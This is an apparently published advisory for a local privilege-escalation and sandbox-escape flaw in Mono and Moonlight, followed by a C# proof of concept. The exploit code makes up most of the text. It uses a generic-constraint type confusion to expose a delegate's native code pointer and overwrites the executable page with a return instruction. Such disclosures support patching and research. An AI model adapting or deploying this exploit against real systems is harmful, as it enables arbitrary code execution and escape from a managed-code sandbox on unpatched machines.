Mono/Moonlight Local Privilege Escalation

`Mono and Moonlight is prone to a local privilege-escalation vulnerability.  
  
Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.  
  
PoC:  
  
using System;  
using System.Reflection;  
using System.Runtime.InteropServices;  
  
public class DelegateWrapper {  
public IntPtr method_ptr;  
}  
  
public delegate void MethodWrapper ();  
  
public class BreakSandbox {  
private static DelegateWrapper Convert <T> (T dingus) where T :  
DelegateWrapper {  
return dingus;  
}  
  
private static DelegateWrapper ConvertDelegate (Delegate del) {  
var m = typeof (BreakSandbox).GetMethod ("Convert",  
BindingFlags.NonPublic | BindingFlags.Static);  
var gm = m.MakeGenericMethod (typeof (Delegate));  
  
var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate  
(typeof (Func <Delegate, DelegateWrapper>), null, gm);  
  
return d (del);  
}  
  
public static void Main (string [] args) {  
MethodWrapper d = delegate {  
Console.WriteLine ("Hello");  
};  
  
d ();  
var converted = ConvertDelegate (d);  
// Overwrite the already WX page with a 'ret'  
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);  
d ();  
}  
}  
  
`